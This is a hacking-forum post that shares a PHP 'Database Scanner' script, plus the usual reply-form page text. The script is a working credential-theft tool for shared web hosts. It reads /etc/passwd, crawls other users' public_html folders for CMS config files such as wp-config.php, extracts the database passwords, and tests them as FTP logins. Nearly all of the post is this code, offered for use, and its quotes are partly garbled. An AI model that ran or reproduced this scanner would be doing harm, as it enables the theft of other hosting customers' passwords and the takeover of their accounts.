Jump to content
ilbr22

Database Scanner

By ilbr22, in Programe hacking

Recommended Posts

ilbr22 Newbie

ilbr22

Posted
Posted

This is a database scanner used to looking for file configuration (file that connects into database CMS application).

<?php
 echo “<html>”;
 echo “<title>[ Database Scanner]</title><body>”;
 set_time_limit(0);
 ##################
 @$passwd=fopen(‘/etc/passwd’,'r’);
 if (!$passwd) {
 echo “[-] Error : Can’t read /etc/passwd”;
 exit;
 }
 $path_to_public=array();
 $users=array();
 $pathtoconf=array();
 $i=0;
 while(!feof($passwd)) {
 $str=fgets($passwd);
 if ($i>35) {
 $pos=strpos($str,”:”);
 $username=substr($str,0,$pos);
 $dirz=”/home/$username/public_html/”;
 if (($username!=”")) {
 if (is_readable($dirz)) {
 array_push($users,$username);
 array_push($path_to_public,$dirz);
 }
 }
 }
 $i++;
 }
 ###################
 #########################
 echo “<br><br>”;
 echo “<textarea name=’main_window’ cols=100 rows=20>”;
 echo “[+] Founded “.sizeof($users).” entrys in /etc/passwd\n”;
 echo “[+] Founded “.sizeof($path_to_public).” readable public_html directories\n”;
 echo “[~] Searching for passwords in config.* files…\n\n”;
 foreach ($users as $user) {
 $path=”/home/$user/public_html/”;
 read_dir($path,$user);
 }
 echo “\n[+] Done\n”;
 function read_dir($path,$username) {
 if ($handle = opendir($path)) {
 while (false !== ($file = readdir($handle))) {
 $fpath=”$path$file”;
 if (($file!=’.') and ($file!=’..’)) {
 if (is_readable($fpath)) {
 $dr=”$fpath/”;
 if (is_dir($dr)) {
 read_dir($dr,$username);
 }
 else {
 if (($file==’config.php’) or ($file==’header.inc.php’) or  ($file==’content.inc.php’) or ($file==’mainfile.php’) or  ($file==’utils.inc.php’) or ($file==’main.php’) or  ($file==’config.inc.php’) or ($file==’db.inc.php’) or  ($file==’connect.php’) or ($file==’wp-config.php’) or ($file==’var.php’)  or ($file==’configure.php’) or ($file==’configuration.php’) or  ($file==’configurations.php’) or ($file==’configs.php’) or  ($file==’config.locale.php’) or ($file==’db.inc.php’) or  ($file==’dbconnect.inc.php’) or ($file==’dbconnection.php’) or  ($file==’var.php’) or ($file==’mysql.php’) or ($file==’global.inc.php’)  or ($file==’database.php’) or ($file==’dbconnect.php’) or  ($file==’conf.php’) or ($file==’configDB.inc.php’) or ($file==’db.php’)  or ($file==’db_connect.php’)) {
 $pass=get_pass($fpath);
 if ($pass!=”) {
 echo “[+] $fpath\n$pass\n”;
 ftp_check($username,$pass);
 }
 }
 }
 }
 }
 }
 }
 }
 function get_pass($link) {
 @$config=fopen($link,’r');
 while(!feof($config)) {
 $line=fgets($config);
 if (strstr($line,’pass’) or strstr($line,’password’) or strstr($line,’passwd’)) {
 if (strrpos($line,’”‘))
 $pass=substr($line,(strpos($line,’=')+3),(strrpos($line,’”‘)-(strpos($line,’=')+3)));
 else
 $pass=substr($line,(strpos($line,’=')+3),(strrpos($line,”‘”)-(strpos($line,’=')+3)));
 return $pass;
 }
 }
 }
 function ftp_check($login,$pass) {
 @$ftp=ftp_connect(’127.0.0.1?);
 if ($ftp) {
 @$res=ftp_login($ftp,$login,$pass);
 if ($res) {
 echo ‘[FTP] ‘.$login.’:’.$pass.”  Success\n”;
 }
 else ftp_quit($ftp);
 }
 }
 echo “</textarea><br>”;
 echo “</body></html>”;
 ?>

sursa: Database Scanner - r00tsecurity

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...